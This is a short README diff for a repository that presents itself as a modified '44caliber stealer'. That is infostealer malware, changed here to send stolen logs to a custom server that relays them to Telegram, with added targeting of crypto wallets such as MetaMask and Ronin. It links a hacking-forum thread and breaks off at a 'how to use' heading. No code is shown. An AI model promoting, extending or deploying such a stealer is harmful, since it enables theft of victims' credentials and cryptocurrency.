Phuong39/44CALIBER-SERVER/README.md

 44caliber stealer by khainaaeh but with server and some more crypto wallets

 changes:
-- sending to discord replaced with sending to custom server (/server) and then server sends log to your telegram
+- sending to discord replaced with sending to custom server (/server) and then server sends log to your telegram (server based on my previous project https://lolz.guru/threads/2361390/)
 - added some more crypto wallets (metamask, roninwallet, bravewallet, binancechain)

 how to use: